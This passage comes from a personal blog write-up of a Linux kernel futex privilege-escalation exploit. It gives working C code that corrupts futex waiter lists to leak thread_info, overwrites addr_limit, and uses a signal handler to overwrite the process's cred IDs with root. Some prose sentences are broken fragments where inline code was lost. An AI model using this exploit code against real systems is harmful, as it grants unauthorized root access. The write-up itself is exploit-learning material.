fake_waiter.list_entry.node_list.prev <strong>=</strong> <strong>&</strong>leaker_waiter.list_entry.node_list;

fake_waiter.list_entry.prio_list.prev <strong>=</strong> <strong>&</strong>leaker_waiter.list_entry.prio_list;

fake_waiter.list_entry.prio <strong>=</strong> DEFAULT_PRIO <strong>+</strong> 1;

}

<strong>void</strong> <strong>leak_thread_info</strong>()

{

link_fake_leaker_waiters();

assert(<strong>!</strong>pthread_create(<strong>&</strong>corrupter, NULL, lock_pi_futex, NULL));

sleep(1);

corrupter_thread_info <strong>=</strong> (<strong>struct</strong> thread_info <strong>*</strong>)((<strong>unsigned</strong> <strong>int</strong>)leaker_waiter.list_entry.prio_list.next <strong>&</strong> THREAD_INFO_BASE);

printf(USERLOG "Corrupter's thread_info @ %p\n", corrupter_thread_info);

}

Let’s first address what’s called a “Thread Info”.

<strong>struct</strong> thread_info {

<strong>struct</strong> task_struct <strong>*</strong>task; <em>/* main task structure */</em>

<strong>struct</strong> exec_domain <strong>*</strong>exec_domain; <em>/* execution domain */</em>

__u32 flags; <em>/* low level flags */</em>

__u32 status; <em>/* thread synchronous flags */</em>

__u32 cpu; <em>/* current CPU */</em>

<strong>int</strong> preempt_count; <em>/* 0 => preemptable,

<0 => BUG */</em>

mm_segment_t addr_limit;

<strong>struct</strong> restart_block restart_block;

<strong>void</strong> __user <strong>*</strong>sysenter_return;

<strong>unsigned</strong> <strong>int</strong> sig_on_uaccess_error<strong>:</strong>1;

<strong>unsigned</strong> <strong>int</strong> uaccess_err<strong>:</strong>1; <em>/* uaccess failed */</em>

};

The reason it interests us is because it’s relatively easy to get its address once you have a leak, and the more interesting reason is that it contains a pointer to the process’

. Just to clarify, a newIn order to do the actual leak, we link together two fake waiters. One is named

By linking I mean in practice that we set the previous node of the

Those aren’t the actual priorities but the idea remains.

After we’ve linked the waiters in userspace, we call

Awesome! We’ve leaked a kernel stack address of one of the threads in our program.

, all we have to do is AND its address with<em>/* how to get the thread information struct from C */</em>

<strong>static</strong> <strong>inline</strong> <strong>struct</strong> thread_info <strong>*</strong><strong>current_thread_info</strong>(<strong>void</strong>)

{

<strong>return</strong> (<strong>struct</strong> thread_info <strong>*</strong>)

(current_stack_pointer <strong>&</strong> <strong>~</strong>(THREAD_SIZE <strong>-</strong> 1));

}

We have a hold of the

# Overwriting Address Limit

Just as we can read by corrupting the list, we can utilize the same technique in order to use it for writing purposes. The first memory area that we’ll be targeting is what’s called the “Address Limit”.

It lays under

The

, we’re going to call<strong>void</strong> <strong>kmemcpy</strong>(<strong>void</strong> <strong>*</strong>src, <strong>void</strong> <strong>*</strong>dst, <strong>size_t</strong> len)

{

<strong>int</strong> pipefd[2];

assert(<strong>!</strong>pipe(pipefd));

assert(write(pipefd[1], src, len) <strong>==</strong> len);

assert(read(pipefd[0], dst, len) <strong>==</strong> len);

}

<strong>void</strong> <strong>escalate_priv_sighandler</strong>()

{

<strong>struct</strong> task_struct <strong>*</strong>corrupter_task, <strong>*</strong>main_task;

<strong>struct</strong> cred <strong>*</strong>main_cred;

<strong>unsigned</strong> <strong>int</strong> root_id <strong>=</strong> 0;

<strong>void</strong> <strong>*</strong>highest_addr <strong>=</strong> (<strong>void</strong> <strong>*</strong>)<strong>-</strong>1;

<strong>unsigned</strong> <strong>int</strong> i;

puts(USERLOG "Escalating main thread's privileges to root.");

kmemcpy(<strong>&</strong>highest_addr, <strong>&</strong>corrupter_thread_info<strong>-></strong>addr_limit, <strong>sizeof</strong>(highest_addr));

printf(USERLOG "Written 0x%x to addr_limit.\n", <strong>-</strong>1);

kmemcpy(<strong>&</strong>corrupter_thread_info<strong>-></strong>task, <strong>&</strong>corrupter_task, <strong>sizeof</strong>(corrupter_thread_info<strong>-></strong>task));

printf(USERLOG "Corrupter's task_struct @ %p\n", corrupter_task);

kmemcpy(<strong>&</strong>corrupter_task<strong>-></strong>group_leader, <strong>&</strong>main_task, <strong>sizeof</strong>(corrupter_task<strong>-></strong>group_leader));

printf(USERLOG "Main thread's task_struct @ %p\n", main_task);

kmemcpy(<strong>&</strong>main_task<strong>-></strong>cred, <strong>&</strong>main_cred, <strong>sizeof</strong>(main_task<strong>-></strong>cred));

printf(USERLOG "Main thread's cred @ %p\n", main_cred);

<strong>for</strong> (i <strong>=</strong> 0; i <strong><</strong> COUNT_OF(main_cred<strong>-></strong>ids); i<strong>++</strong>)

kmemcpy(<strong>&</strong>root_id, <strong>&</strong>main_cred<strong>-></strong>ids[i], <strong>sizeof</strong>(root_id));

puts(USERLOG "Escalated privileges to root successfully.");

}

<strong>void</strong> <strong>escalate_priv</strong>()

{

pthread_t addr_limit_writer;

<strong>struct</strong> sigaction sigact <strong>=</strong> {.sa_handler <strong>=</strong> escalate_priv_sighandler};

assert(<strong>!</strong>sigaction(SIGINT, <strong>&</strong>sigact, NULL));

puts(USERLOG "Registered the privileges escalator signal handler for interrupting the corrupter thread.");

fake_waiter.list_entry.prio_list.prev <strong>=</strong> (<strong>struct</strong> list_head <strong>*</strong>)<strong>&</strong>corrupter_thread_info<strong>-></strong>addr_limit;

assert(<strong>!</strong>pthread_create(<strong>&</strong>addr_limit_writer, NULL, lock_pi_futex, NULL));

sleep(1);

pthread_kill(corrupter, SIGINT);

}

Let’s briefly mention what signal handlers are and why do we use them. A signal handler is a function that is called by the target environment when the corresponding signal occurs. The target environment **suspends execution** of the program until the signal handler returns.

This mechanism allows us to **interrupt** the process’ job in order to perform some other work. In our case, we’d like to form the kernel stack in a certain way and also be able to execute a piece of code on the same thread. However, in order to arrange the stack we have to perform a blocking operation because otherwise our arrangement would be overwritten, but if you block you can’t exploit the stack’s state.

That’s why signal are needed and why they’re used in our scenario. They allow us to execute code within the process’ context **outside its normal execution flow**.

I’m reminding you that when talking about

CLONE_THREAD

The flags mask must also include CLONE_SIGHAND if CLONE_THREAD is specified.

Afterwards, we’re going to place the address that we want to write to, that is

Now we’ve arrived to a scenario where

Because each thread has its own

, which in turn means that each thread also has its own*specific*thread whose

What this function does is read and write to different areas in kernel memory. In order to do it, I wrote a small helper function called

. It exploits the fact that<strong>unsigned</strong> <strong>long</strong>

<strong>_copy_from_user</strong>(<strong>void</strong> <strong>*</strong>to, <strong>const</strong> <strong>void</strong> __user <strong>*</strong>from, <strong>unsigned</strong> <strong>long</strong> n)

{

<strong>if</strong> (access_ok(VERIFY_READ, from, n)) <em>// <-- addr_limit comparison</em>

n <strong>=</strong> __copy_from_user(to, from, n);

<strong>else</strong>

memset(to, 0, n);

<strong>return</strong> n;

}

<strong>unsigned</strong> <strong>long</strong>

<strong>copy_to_user</strong>(<strong>void</strong> __user <strong>*</strong>to, <strong>const</strong> <strong>void</strong> <strong>*</strong>from, <strong>unsigned</strong> <strong>long</strong> n)

{

<strong>if</strong> (access_ok(VERIFY_WRITE, to, n)) <em>// <-- addr_limit comparison</em>

n <strong>=</strong> __copy_to_user(to, from, n);

<strong>return</strong> n;

}

<strong>#define access_ok(type, addr, size) \

(likely(__range_not_ok(addr, size, user_addr_max()) == 0))

</strong>

<strong>#define user_addr_max() (current_thread_info()->addr_limit.seg)

</strong>

At the signal handler several operations are done.

- Cancel the address space access limitation by setting
to the highest value possible.addr_limit
- Read the
pointer of the corrupted thread.task_struct
- Read the parent’s
pointer from the corrupted thread’stask_structvia thetask_structmember which points to it.group_leader
- Read the
struct pointer from the parent’scred.task_struct
- Overwrite all the identifiers (uid, gid, suid, sgid, etc.) of the main
struct.cred

# Popping Shell

Now all that’s left to do is

Because the child process inherits the

# Concluding

This has been a lot of fun, and I’ve learned so much on the way.

I got to have the interaction I desired with the kernel, working with it and understanding how it works a bit better. Needless to say, there’s an infinite amount of knowledge to be gathered, but that’s a small step onwards. At the end, the exploit seems relatively short, but the truly important part is getting there and being able to solve the puzzle.

The full repository can be found here.

If you have any questions, feel free to contact me and I’ll gladly answer.

Hope you enjoyed the read. Thanks!

Special thanks to Nspace who helped throughout the process.